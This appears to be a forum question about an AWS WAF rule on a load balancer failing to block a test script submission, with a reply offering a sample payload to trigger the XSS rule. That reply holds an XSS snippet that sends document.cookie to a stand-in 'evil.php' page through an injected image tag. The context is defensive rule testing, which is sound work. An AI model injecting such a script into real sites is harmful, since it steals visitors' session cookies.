I tried submitting a form with <script>danger</script> and I was NOT blocked. I put WAF on my ELB and did test to make sure I have analytics (Below).
What am I doing wrong?
Here is my ACL:
Here is my XSS and SQL Rule:
Analytics: (To show that traffic is indeed routing though LB)
Below is one example of how to trigger a XSS rule. This ought to trigger your rule all by itself (you can prove it out by pointing it to your own PHP page or other web location), but this at least demonstrates the general principle.
<script type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
document.write("<img src='" + adr + "' />");
</script>
This and other examples are available the following OWASP article:
